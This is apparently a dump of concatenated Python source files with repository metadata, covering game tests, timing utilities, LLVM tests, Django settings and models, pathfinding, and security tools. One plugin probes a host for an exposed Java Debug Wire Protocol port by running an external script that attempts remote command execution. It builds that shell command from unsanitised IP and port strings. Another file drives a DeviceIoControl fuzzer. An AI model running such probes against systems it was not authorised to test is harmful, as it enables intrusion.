moves, 2 rotations self.assertEquals(len(p2_red), 7) self.assertEquals(len(p2_red), len(p2_silver)) p3_silver = self.game.get(0, 3).get_moves(self.game) p3_red = self.game.get(9, 3).get_moves(self.game) # 4 moves, 2 rotations self.assertEquals(len(p3_red), 6) self.assertEquals(len(p3_red), len(p3_silver)) p3_silver = self.game.get(0, 4).get_moves(self.game) p3_red = self.game.get(9, 4).get_moves(self.game) # 4 moves, 2 rotations self.assertEquals(len(p3_red), 6) self.assertEquals(len(p3_red), len(p3_silver)) p4_silver = self.game.get(2, 3).get_moves(self.game) p4_red = self.game.get(7, 4).get_moves(self.game) # 6 moves, 2 rotations self.assertEquals(len(p4_red), 8) self.assertEquals(len(p4_red), len(p4_silver)) p5_silver = self.game.get(7, 0).get_moves(self.game) p5_red = self.game.get(2, 7).get_moves(self.game) # 4 moves, 2 rotations self.assertEquals(len(p5_silver), 6) self.assertEquals(len(p5_red), len(p5_silver)) def test_destroy_pieces_classic(self): self.game.apply_move(Move(MoveType.move, Position(2, 1), Position(2, 0))) self.game.apply_laser(TeamColor.silver) self.game.apply_move(Move(MoveType.move, Position(7, 6), Position(7, 7))) self.game.apply_laser(TeamColor.red) self.game.apply_move(Move(MoveType.rotate, Position(0, 0), Orientation.right)) self.game.apply_laser(TeamColor.silver) self.assertEquals(len(self.game.squares_with_pieces_of_color(TeamColor.silver)), len(self.game.squares_with_pieces_of_color(TeamColor.red)) + 1) self.game.apply_move(Move(MoveType.rotate, Position(9, 7), Orientation.left)) self.game.apply_laser(TeamColor.red) self.assertEquals(len(self.game.squares_with_pieces_of_color(TeamColor.silver)), len(self.game.squares_with_pieces_of_color(TeamColor.red))) def test_red_wins_classic(self): self.game.apply_move(Move(MoveType.move, Position(0, 3), Position(0, 2))) self.game.apply_move(Move(MoveType.move, Position(3, 2), Position(5, 2))) self.game.apply_laser(TeamColor.silver) self.assertEquals(self.game.winner, TeamColor.red) def simple_silver_win(self): pass def test_same_number_moves(self): red_moves = self.game.get_available_moves(TeamColor.red) silver_moves = self.game.get_available_moves(TeamColor.silver) self.assertEquals(len(red_moves), len(silver_moves))
mit
1,106,180,224,603,944,700
41.774194
89
0.643477
false
2.963128
true
false
false
takeshineshiro/heat
heat/common/timeutils.py
1
2831
# # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ Utilities for handling ISO 8601 duration format. """ import datetime import random import re import time from heat.common.i18n import _ iso_duration_re = re.compile('PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?$') wallclock = time.time class Duration(object): ''' Note that we don't attempt to handle leap seconds or large clock jumps here. The latter are assumed to be rare and the former negligible in the context of the timeout. Time zone adjustments, Daylight Savings and the like *are* handled. PEP 418 adds a proper monotonic clock, but only in Python 3.3. ''' def __init__(self, timeout=0): self._endtime = wallclock() + timeout def expired(self): return wallclock() > self._endtime def endtime(self): return self._endtime def parse_isoduration(duration): """ Convert duration in ISO 8601 format to second(s). Year, Month, Week, and Day designators are not supported. Example: 'PT12H30M5S' """ result = iso_duration_re.match(duration) if not result: raise ValueError(_('Only ISO 8601 duration format of the form ' 'PT#H#M#S is supported.')) t = 0 t += (3600 * int(result.group(1))) if result.group(1) else 0 t += (60 * int(result.group(2))) if result.group(2) else 0 t += int(result.group(3)) if result.group(3) else 0 return t def retry_backoff_delay(attempt, scale_factor=1.0, jitter_max=0.0): """ Calculate an exponential backoff delay with jitter. Delay is calculated as 2^attempt + (uniform random from [0,1) * jitter_max) :param attempt: The count of the current retry attempt :param scale_factor: Multiplier to scale the exponential delay by :param jitter_max: Maximum of random seconds to add to the delay :returns: Seconds since epoch to wait until """ exp = float(2 ** attempt) * float(scale_factor) if jitter_max == 0.0: return exp return exp + random.random() * jitter_max def round_to_seconds(dt): """Round a datetime to the nearest second.""" rounding = 0 if dt.microsecond >= 500000: rounding = 1 return dt + datetime.timedelta(0, rounding, -dt.microsecond)
apache-2.0
-6,785,138,763,645,567,000
29.771739
78
0.655245
false
3.759628
false
false
false
bsilverthorn/qy
src/qy/test/test_language.py
1
8791
""" @author: Bryan Silverthorn <bcs@cargo-cult.org> """ import math import numpy import qy from nose.tools import ( assert_true, assert_false, assert_equal, assert_raises, assert_almost_equal, ) from qy import ( emit_and_execute, Object, ) def test_qy_python_no_arguments(): """ Test the python() LLVM construct without arguments. """ executed = [False] @emit_and_execute() def _(): @qy.python() def _(): executed[0] = [True] assert_true(executed[0]) def test_qy_python_arguments(): """ Test the python() LLVM construct with arguments. """ values = [] @emit_and_execute() def _(): @qy.for_(8) def _(i): @qy.python(i) def _(j): values.append(j) assert_equal(values, range(8)) def test_qy_python_exception(): """ Test exception handling in the python() LLVM construct. """ class ExpectedException(Exception): pass def should_raise(): @emit_and_execute() def _(): @qy.python() def _(): raise ExpectedException() assert_raises(ExpectedException, should_raise) def test_qy_python_exception_short_circuiting(): """ Test short-circuiting of exceptions in the python() LLVM construct. """ class ExpectedException(Exception): pass def should_raise(): @emit_and_execute() def _(): @qy.python() def _(): raise ExpectedException() @qy.python() def _(): assert_true(False, "control flow was not short-circuited") assert_raises(ExpectedException, should_raise) def test_qy_if_(): """ Test the qy-LLVM if_() construct. """ bad = [True] @emit_and_execute() def _(): @qy.if_(True) def _(): @qy.python() def _(): del bad[:] assert_false(bad) @emit_and_execute() def _(): @qy.if_(False) def _(): @qy.python() def _(): assert_true(False) def test_qy_if_else(): """ Test the qy-LLVM if_else() construct. """ bad = [True] @emit_and_execute() def _(): @qy.if_else(True) def _(then): if then: @qy.python() def _(): del bad[:] else: @qy.python() def _(): assert_true(False) assert_false(bad) bad = [True] @emit_and_execute() def _(): @qy.if_else(False) def _(then): if then: @qy.python() def _(): assert_true(False) else: @qy.python() def _(): del bad[:] assert_false(bad) def test_qy_for_(): """ Test the qy-LLVM for_() loop construct. """ count = 128 iterations = [0] @emit_and_execute() def _(): @qy.for_(count) def _(_): @qy.python() def _(): iterations[0] += 1 assert_equal(iterations[0], count) def test_qy_break_(): """ Test the qy break_() statement. """ count = 64 iterations = [0] @emit_and_execute() def _(): @qy.for_(count * 2) def _(i): @qy.python() def _(): iterations[0] += 1 @qy.if_(i == count - 1) def _(): qy.break_() assert_equal(iterations[0], count) def test_qy_object_basics(): """ Test basic operations on LLVM-wrapped Python objects. """ result = [None] text = "testing" def do_function(string_py): result[0] = string_py @emit_and_execute() def _(): do = Object.from_object(do_function) string = Object.from_string(text) do(string) assert_equal(result, [text]) def test_qy_py_print(): """ Test the py_print() LLVM construct with arguments. """ import sys from cStringIO import StringIO old_stdout = sys.stdout try: new_stdout = StringIO() sys.stdout = new_stdout @emit_and_execute() def _(): qy.py_print("test text\n") finally: sys.stdout = old_stdout assert_equal(new_stdout.getvalue(), "test text\n") def test_qy_py_printf(): """ Test the py_printf() LLVM construct with arguments. """ import sys from cStringIO import StringIO old_stdout = sys.stdout try: new_stdout = StringIO() sys.stdout = new_stdout @emit_and_execute() def _(): @qy.for_(8) def _(i): qy.py_printf("i = %i\n", i) finally: sys.stdout = old_stdout assert_equal( new_stdout.getvalue(), "".join("i = %i\n" % i for i in xrange(8)), ) def test_qy_nested_for_(): """ Test the qy-LLVM for_() loop construct, nested. """ count = 32 iterations = [0] @emit_and_execute() def _(): @qy.for_(count) def _(_): @qy.for_(count) def _(_): @qy.python() def _(): iterations[0] += 1 assert_equal(iterations[0], count**2) def test_qy_assert_(): """ Test the qy-LLVM assert_() construct. """ # should not raise @emit_and_execute() def _(): qy.assert_(True) # should raise from qy import EmittedAssertionError def should_raise(): @emit_and_execute() def _(): qy.assert_(False) assert_raises(EmittedAssertionError, should_raise) def test_qy_random(): """ Test the qy-LLVM random() construct. """ count = 4096 total = [0.0] @emit_and_execute() def _(): @qy.for_(count) def _(_): v = qy.random() @qy.python(v) def _(v_py): total[0] += v_py assert_almost_equal(total[0] / count, 0.5, places = 1) def test_qy_random_int(): """ Test the qy-LLVM random_int() construct. """ count = 32 values = [] @emit_and_execute() def _(): @qy.for_(count) def _(_): v = qy.random_int(2) @qy.python(v) def _(v_py): values.append(v_py) assert_true(len(filter(None, values)) > 8) assert_true(len(filter(None, values)) < 24) def test_qy_select(): """ Test the select() LLVM construct without arguments. """ result = [None, None] @emit_and_execute() def _(): v0 = qy.select(True, 3, 4) v1 = qy.select(False, 3, 4) @qy.python(v0, v1) def _(v0_py, v1_py): result[0] = v0_py result[1] = v1_py assert_equal(result[0], 3) assert_equal(result[1], 4) def test_qy_is_nan(): """ Test LLVM real-value is_nan property. """ @emit_and_execute() def _(): a = qy.value_from_any(-0.000124992188151).is_nan b = qy.value_from_any(numpy.nan).is_nan @qy.python(a, b) def _(a_py, b_py): assert_false(a_py) assert_true(b_py) def test_qy_log(): """ Test the LLVM log() intrinsic wrapper. """ @emit_and_execute() def _(): v0 = qy.log(math.e) @qy.python(v0) def _(v0_py): assert_equal(v0_py, 1.0) def test_qy_log1p(): """ Test the LLVM log1p() construct. """ @emit_and_execute() def _(): v0 = qy.log1p(math.e - 1.0) @qy.python(v0) def _(v0_py): assert_equal(v0_py, 1.0) def test_qy_exp(): """ Test the LLVM exp() intrinsic wrapper. """ @emit_and_execute() def _(): v0 = qy.exp(1.0) @qy.python(v0) def _(v0_py): assert_equal(v0_py, math.e) def test_qy_real_neg(): """ Test the floating-point negation operation. """ @emit_and_execute() def _(): x = qy.value_from_any(3) y = qy.value_from_any(-5) @qy.python(-x, -y) def _(a_py, b_py): assert_equal(a_py, -3) assert_equal(b_py, 5) def test_qy_integer_mod(): """ Test the integer modulo operation. """ @emit_and_execute() def _(): x = qy.value_from_any(3) y = qy.value_from_any(5) z = qy.value_from_any(-2) @qy.python(x % y, y % z, z % y) def _(a_py, b_py, c_py): assert_equal(a_py, 3) assert_equal(b_py, 2) assert_equal(c_py, -2)
mit
2,407,731,293,992,260,000
18.449115
74
0.475145
false
3.366909
true
false
false
blstream/ut-arena
ut_arena_py_api/ut_arena/settings.py
1
3193
""" Django settings for ut_arena_py_api project. Generated by 'django-admin startproject' using Django 1.9.2. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '!2stj*=!93mhvadu7moo(^ak6(jkl&(y*%q59l=7qj(5+n*-r)' # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'rest_framework', 'rest_framework.authtoken', 'apps.utarena', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'ut_arena.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'ut_arena.wsgi.application' # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/' # Rest settings REST_FRAMEWORK = { 'DEFAULT_PERMISSION_CLASSES': ( 'rest_framework.permissions.IsAuthenticated', ), 'PAGE_SIZE': 10, 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework.authentication.TokenAuthentication', ) }
apache-2.0
7,903,634,078,388,148,000
26.765217
91
0.68932
false
3.551724
false
false
false
brean/python-pathfinding
pathfinding/finder/finder.py
1
6586
# -*- coding: utf-8 -*- import heapq # used for the so colled "open list" that stores known nodes import time # for time limitation from pathfinding.core.util import SQRT2 from pathfinding.core.diagonal_movement import DiagonalMovement # max. amount of tries we iterate until we abort the search MAX_RUNS = float('inf') # max. time after we until we abort the search (in seconds) TIME_LIMIT = float('inf') # used for backtrace of bi-directional A* BY_START = 1 BY_END = 2 class ExecutionTimeException(Exception): def __init__(self, message): super(ExecutionTimeException, self).__init__(message) class ExecutionRunsException(Exception): def __init__(self, message): super(ExecutionRunsException, self).__init__(message) class Finder(object): def __init__(self, heuristic=None, weight=1, diagonal_movement=DiagonalMovement.never, weighted=True, time_limit=TIME_LIMIT, max_runs=MAX_RUNS): """ find shortest path :param heuristic: heuristic used to calculate distance of 2 points (defaults to manhattan) :param weight: weight for the edges :param diagonal_movement: if diagonal movement is allowed (see enum in diagonal_movement) :param weighted: the algorithm supports weighted nodes (should be True for A* and Dijkstra) :param time_limit: max. runtime in seconds :param max_runs: max. amount of tries until we abort the search (optional, only if we enter huge grids and have time constrains) <=0 means there are no constrains and the code might run on any large map. """ self.time_limit = time_limit self.max_runs = max_runs self.weighted = weighted self.diagonal_movement = diagonal_movement self.weight = weight self.heuristic = heuristic def calc_cost(self, node_a, node_b): """ get the distance between current node and the neighbor (cost) """ if node_b.x - node_a.x == 0 or node_b.y - node_a.y == 0: # direct neighbor - distance is 1 ng = 1 else: # not a direct neighbor - diagonal movement ng = SQRT2 # weight for weighted algorithms if self.weighted: ng *= node_b.weight return node_a.g + ng def apply_heuristic(self, node_a, node_b, heuristic=None): """ helper function to apply heuristic """ if not heuristic: heuristic = self.heuristic return heuristic( abs(node_a.x - node_b.x), abs(node_a.y - node_b.y)) def find_neighbors(self, grid, node, diagonal_movement=None): ''' find neighbor, same for Djikstra, A*, Bi-A*, IDA* ''' if not diagonal_movement: diagonal_movement = self.diagonal_movement return grid.neighbors(node, diagonal_movement=diagonal_movement) def keep_running(self): """ check, if we run into time or iteration constrains. :returns: True if we keep running and False if we run into a constraint """ if self.runs >= self.max_runs: raise ExecutionRunsException( '{} run into barrier of {} iterations without ' 'finding the destination'.format( self.__class__.__name__, self.max_runs)) if time.time() - self.start_time >= self.time_limit: raise ExecutionTimeException( '{} took longer than {} seconds, aborting!'.format( self.__class__.__name__, self.time_limit)) def process_node(self, node, parent, end, open_list, open_value=True): ''' we check if the given node is path of the path by calculating its cost and add or remove it from our path :param node: the node we like to test (the neighbor in A* or jump-node in JumpPointSearch) :param parent: the parent node (the current node we like to test) :param end: the end point to calculate the cost of the path :param open_list: the list that keeps track of our current path :param open_value: needed if we like to set the open list to something else than True (used for bi-directional algorithms) ''' # calculate cost from current node (parent) to the next node (neighbor) ng = self.calc_cost(parent, node) if not node.opened or ng < node.g: node.g = ng node.h = node.h or \ self.apply_heuristic(node, end) * self.weight # f is the estimated total cost from start to goal node.f = node.g + node.h node.parent = parent if not node.opened: heapq.heappush(open_list, node) node.opened = open_value else: # the node can be reached with smaller cost. # Since its f value has been updated, we have to # update its position in the open list open_list.remove(node) heapq.heappush(open_list, node) def check_neighbors(self, start, end, grid, open_list, open_value=True, backtrace_by=None): """ find next path segment based on given node (or return path if we found the end) :param start: start node :param end: end node :param grid: grid that stores all possible steps/tiles as 2D-list :param open_list: stores nodes that will be processed next """ raise NotImplementedError( 'Please implement check_neighbors in your finder') def find_path(self, start, end, grid): """ find a path from start to end node on grid by iterating over all neighbors of a node (see check_neighbors) :param start: start node :param end: end node :param grid: grid that stores all possible steps/tiles as 2D-list :return: """ self.start_time = time.time() # execution time limitation self.runs = 0 # count number of iterations start.opened = True open_list = [start] while len(open_list) > 0: self.runs += 1 self.keep_running() path = self.check_neighbors(start, end, grid, open_list) if path: return path, self.runs # failed to find path return [], self.runs
mit
-7,266,928,208,447,150,000
35.588889
79
0.58928
false
4.23537
false
false
false
django-id/website
app_author/models.py
1
2195
from django.contrib.auth.models import User from django.core.exceptions import ValidationError from django.db import models from django.db.models.signals import post_save from django.dispatch import receiver # CUSTOM FILE SIZE VALIDATOR def validate_image(fieldfile_obj): """ Limit image size upload """ filesize = fieldfile_obj.file.size megabyte_limit = 0.5 if filesize > megabyte_limit*1024*1024: raise ValidationError("Max file size is %sMB" % str(megabyte_limit)) class Profile(models.Model): """ Author Model """ user = models.OneToOneField( User, on_delete=models.CASCADE ) profile_picture = models.ImageField( upload_to='images/%Y/%m/%d', validators=[validate_image], blank=True, null=True ) profile_name = models.CharField( verbose_name='Name', null=True, blank=True, max_length=50 ) profile_email = models.EmailField( verbose_name='Email Address', null=True, blank=True ) profile_location = models.CharField( verbose_name='Origin/City', null=True, blank=True, max_length=50 ) profile_github = models.URLField( verbose_name='Github URL', null=True, blank=True ) slug = models.SlugField() is_created = models.DateTimeField( null=True, blank=True ) is_moderator = models.BooleanField( default=False, ) def __str__(self): return str(self.user) def save(self, **kwargs): if not self.slug: from djangoid.utils import get_unique_slug self.slug = get_unique_slug(instance=self, field='profile_name') super(Profile, self).save(**kwargs) @receiver(post_save, sender=User) def create_user_profile(sender, instance, created, **kwargs): """ Automatically Create User when Login """ if created: Profile.objects.create(user=instance) @receiver(post_save, sender=User) def save_user_profile(sender, instance, **kwargs): """ Automatically Create User when Login """ instance.profile.save()
mit
-1,107,724,903,978,328,600
21.397959
76
0.618223
false
3.933692
false
false
false
mhl/mysociety-cvs
sitestats/pylib/sitestats/backports/contrib/auth/middleware.py
1
2933
from django.contrib import auth from django.core.exceptions import ImproperlyConfigured class RemoteUserMiddleware(object): """ Middleware for utilizing web-server-provided authentication. If request.user is not authenticated, then this middleware attempts to authenticate the username passed in the ``REMOTE_USER`` request header. If authentication is successful, the user is automatically logged in to persist the user in the session. The header used is configurable and defaults to ``REMOTE_USER``. Subclass this class and change the ``header`` attribute if you need to use a different header. """ # Name of request header to grab username from. This will be the key as # used in the request.META dictionary, i.e. the normalization of headers to # all uppercase and the addition of "HTTP_" prefix apply. header = "REMOTE_USER" def process_request(self, request): # AuthenticationMiddleware is required so that request.user exists. if not hasattr(request, 'user'): raise ImproperlyConfigured( "The Django remote user auth middleware requires the" " authentication middleware to be installed. Edit your" " MIDDLEWARE_CLASSES setting to insert" " 'django.contrib.auth.middleware.AuthenticationMiddleware'" " before the RemoteUserMiddleware class.") try: username = request.META[self.header] except KeyError: # If specified header doesn't exist then return (leaving # request.user set to AnonymousUser by the # AuthenticationMiddleware). return # If the user is already authenticated and that user is the user we are # getting passed in the headers, then the correct user is already # persisted in the session and we don't need to continue. if request.user.is_authenticated(): if request.user.username == self.clean_username(username, request): return # We are seeing this user for the first time in this session, attempt # to authenticate the user. user = auth.authenticate(remote_user=username) if user: # User is valid. Set request.user and persist user in the session # by logging the user in. request.user = user auth.login(request, user) def clean_username(self, username, request): """ Allows the backend to clean the username, if the backend defines a clean_username method. """ backend_str = request.session[auth.BACKEND_SESSION_KEY] backend = auth.load_backend(backend_str) try: username = backend.clean_username(username) except AttributeError: # Backend has no clean_username method. pass return username
agpl-3.0
-5,813,389,405,922,956,000
42.776119
79
0.650869
false
5.030875
false
false
false
perfidia/seleshot
doc/gen_api.py
1
3756
#!/usr/bin/env python # -*- coding: utf-8 -*- import json import os import sys import string sys.path.append('../src') import seleshot TEMPLATE = """=== API === """ OUTPUT = os.path.join("_static", "api.txt") # from http://legacy.python.org/dev/peps/pep-0257/ def trim(docstring): if not docstring: return '' # Convert tabs to spaces (following the normal Python rules) # and split into a list of lines: lines = docstring.expandtabs().splitlines() # Determine minimum indentation (first line doesn't count): indent = sys.maxint for line in lines[1:]: stripped = line.lstrip() if stripped: indent = min(indent, len(line) - len(stripped)) # Remove indentation (first line is special): trimmed = [lines[0].strip()] if indent < sys.maxint: for line in lines[1:]: trimmed.append(line[indent:].rstrip()) # Strip off trailing and leading blank lines: while trimmed and not trimmed[-1]: trimmed.pop() while trimmed and not trimmed[0]: trimmed.pop(0) # Return a single string: return '\n'.join(trimmed) def fmt(doc, indent = 8): return "\n".join([" " * indent + i for i in trim(doc).split("\n")]) if __name__ == '__main__': print "Generating...", s = seleshot.create() s.driver.get("http://example.com") i = s.get_screen() fd = open(OUTPUT, "w") ########################################################################### fd.write(TEMPLATE) fd.write(" " * 0 + ".. autofunction:: seleshot.create") fd.write("\n\n") fd.write(" " * 0 + ".. class:: ScreenShot(object):") fd.write("\n\n") fd.write(" " * 4 + ".. function:: get_screen(self, url = None):\n\n") fd.write(fmt(s.get_screen.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: close(self):\n\n") fd.write(fmt(s.close.__doc__)) fd.write("\n\n") fd.write(" " * 0 + ".. class:: ImageContainer(object):\n\n") fd.write(fmt(i.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: cut_element(self, id = None, xpath = None):\n\n") fd.write(fmt(i.cut_element.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: cut_area(self, x = 0, y = 0, height = None, width = None):\n\n") fd.write(fmt(i.cut_area.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: draw_dot(self, id = None, xpath = None, coordinates = None, padding = 0, color = None, size = None):\n\n") fd.write(fmt(i.draw_dot.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: draw_frame(self, id = None, xpath = None, coordinates = None, padding = None, color = None, size = None):\n\n") fd.write(fmt(i.draw_frame.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: draw_image(self, id = None, xpath = None, coordinates = None, position = Position.MIDDLE, padding = (0, 0), filename = None, image = None):\n\n") fd.write(fmt(i.draw_image.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: draw_zoom(self, id = None, xpath = None, coordinates = None, position = Position.MIDDLE, padding = (0, 0), zoom = None):\n\n") fd.write(fmt(i.draw_zoom.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: draw_blur(self, id = None, xpath = None):\n\n") fd.write(fmt(i.draw_blur.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: save(self, filename):\n\n") fd.write(fmt(i.save.__doc__)) fd.write("\n\n") fd.write(" " * 4 + ".. function:: is_cut(self):\n\n") fd.write(fmt(i.is_cut.__doc__)) fd.write("\n\n") ########################################################################## fd.close() s.close() print "done"
mit
3,779,118,023,028,133,400
28.809524
183
0.536741
false
3.224034
false
false
false
nanshihui/PocCollect
component/JDWP/JDWPvul.py
1
2106
#!/usr/bin/env python # encoding: utf-8 from t import T import os import platform import subprocess import signal import time import requests,urllib2,json,urlparse class TimeoutError(Exception): pass def command(cmd, timeout=60): """Run command and return the output cmd - the command to run timeout - max seconds to wait for """ is_linux = platform.system() == 'Linux' p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid if is_linux else None) if timeout==0: return p.stdout.read() t_beginning = time.time() seconds_passed = 0 while True: if p.poll() is not None: break seconds_passed = time.time() - t_beginning if timeout and seconds_passed > timeout: if is_linux: os.killpg(p.pid, signal.SIGTERM) else: p.terminate() raise TimeoutError(cmd, timeout) time.sleep(0.1) return p.stdout.read() class P(T): def __init__(self): T.__init__(self) def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): result = {} result['result']=False usecommand='python '+os.path.split(os.path.realpath(__file__))[0]+'/script/jdwpshellifier.py -t '+ip+' -p '+port try: print usecommand msgresult = command(usecommand, timeout=40) print msgresult if 'Command successfully executed' in msgresult: result['result']=True result['VerifyInfo'] = {} result['VerifyInfo']['type']='Java Debug Wire Protocol vul' result['VerifyInfo']['URL'] =ip+':'+port result['VerifyInfo']['payload']='Java Debug Wire Protocol poc' result['VerifyInfo']['result'] =msgresult else: pass except Exception,e: print e.text finally: return result if __name__ == '__main__': print P().verify(ip='120.24.243.216',port='8001')
mit
-8,082,791,348,985,507,000
31.4
135
0.57265
false
4.05
false
false
false
glmcdona/meddle
examples/example_deviceiocontrol/processes.py
1
1377
from process_base import * from targets import * import subprocess import os class ProcessDeviceIo(ProcessBase): def __init__(self, Controller, crashdump_folder, breakpoint_handler, pid, ph, unique_identifier, verbose, logger): # Specific options self.path_to_exe = b"C:\\Windows\\System32\\notepad.exe" self.command_line = b"notepad.exe" self.logger = logger # Initialize self.initialize(Controller, self.__class__.__name__, crashdump_folder, breakpoint_handler, pid, ph, unique_identifier, verbose) def on_debugger_attached(self, Engine): # Set the types self.Engine = Engine self.types = meddle_types(Engine) # Add the targets Engine.AddTarget(Target_Handles) Engine.AddTarget(Target_DeviceIoControl) # Handle process loaded Engine.HandleProcessLoaded() # Start an auto-it script try: subprocess.Popen(['autoit3.exe', os.path.join(os.path.dirname(__file__), "..", "autoit", "notepad_print.au3"), str(self.pid), ">nul"], shell=True) except: print "Warning: autoit3.exe not found on path. Please install it and add it to path to increase the attack surface." # Resume the process that we created suspended. This is called just after the debugger has been attached. if self.start_th >= 0: windll.kernel32.ResumeThread(self.start_th); def log_csv(self, fields): self.logger.log_event(fields)
mit
4,168,101,267,918,378,500
28.319149
149
0.713145
false
3.326087
false
false
false
building39/nebula2
scripts/cdmi_explorer/CDMIMain/handlers.py
1
2951
''' Created on Jun 9, 2013 @author: mmartin ''' import sys from gi.repository import Gtk from CDMIAbout import CDMIAbout from CDMIConnect import CDMIConnect from CDMIHelp import CDMIHelp class Handlers(object): ''' classdocs ''' def __init__(self, session): self.session = session def onAbout(self, *args): CDMIAbout(self.session) def onConnect(self, *args): CDMIConnect(self.session) def onDeleteWindow(self, *args): self.onQuit(*args) def onHelp(self, *args): CDMIHelp(self.session) def onQuit(self, *args): Gtk.main_quit() def onCDMIRowCollapsed(self, *args): treeview = args[0] treeiter = args[1] treepath = args[2] model = treeview.get_model() data = self.session.GET(model[treeiter][1]) self.session.get_children(treeview, treepath, data) self.session.display_cdmi_data(data) def onCDMIRowExpanded(self, *args): treeview = args[0] treeiter = args[1] treepath = args[2] rowname = self._squash_slashes(self.session.cdmimodel.get_value(treeiter, 1)) data = self.session.GET(rowname) treeiter = self.session.cdmimodel.get_iter(treepath) model = treeview.get_model() prefix = rowname if model.iter_has_child(treeiter): num_children = model.iter_n_children(treeiter) for i in range(num_children): if not data: break child = data['children'][i] childpath = self._squash_slashes('%s/%s' % (prefix, child)) childdata = self.session.GET(childpath) childiter = model.iter_nth_child(treeiter, i) self.session.get_children(treeview, model.get_path(childiter), childdata) self.session.display_cdmi_data(data) return def onCDMIRowActivated(self, *args): ''' Display the CDMI data for the selected row. ''' treeview = args[0] treepath = args[1] _column = args[2] model = treeview.get_model() treeiter = model.get_iter(treepath) data = self.session.GET(model[treeiter][1]) self.session.get_children(treeview, treepath, data) self.session.display_cdmi_data(data) def onSelectCursorRow(self, *args): print 'onSelectCursorRow args: %s' % args sys.stdout.flush() def onCursorChanged(self, *args): print 'onCursorChanged args: %s' % args sys.stdout.flush() def _squash_slashes(self, S): T = "" for i in range(len(S)): try: if S[i] == '/' and S[i+1] == '/': i += 1 continue T = T + S[i] except: T = T + S[i] return T
apache-2.0
-8,973,868,036,584,532,000
27.375
85
0.54795
false
3.634236
false
false
false
cliburn/flow
src/plugins/statistics/summary.py
1
1069
"""Provide summary statistics on data.""" from plugin import Statistics from numpy import min, max, mean, median, std class Summary(Statistics): """Plugin to display summary statistics""" name = "Summary" def Main(self, model): """Calculate summary statistics""" self.model = model fields = self.model.GetCurrentData().getAttr('fields') data = self.model.GetCurrentData()[:] low = list(min(data, axis=0)) high = list(max(data, axis=0)) mu = list(mean(data, axis=0)) med = list(median(data)) sig = list(std(data, axis=0)) self.model.NewGroup('Summary statistics') self.model.hdf5.createArray(self.model.current_group, 'min', low) self.model.hdf5.createArray(self.model.current_group, 'max', high) self.model.hdf5.createArray(self.model.current_group, 'mean', mu) self.model.hdf5.createArray(self.model.current_group, 'median', med) self.model.hdf5.createArray(self.model.current_group, 'stdev', sig) self.model.update()
gpl-3.0
-8,669,594,832,415,969,000
41.76
76
0.63985
false
3.636054
false
false
false
mementum/backtrader
backtrader/analyzers/logreturnsrolling.py
1
5020
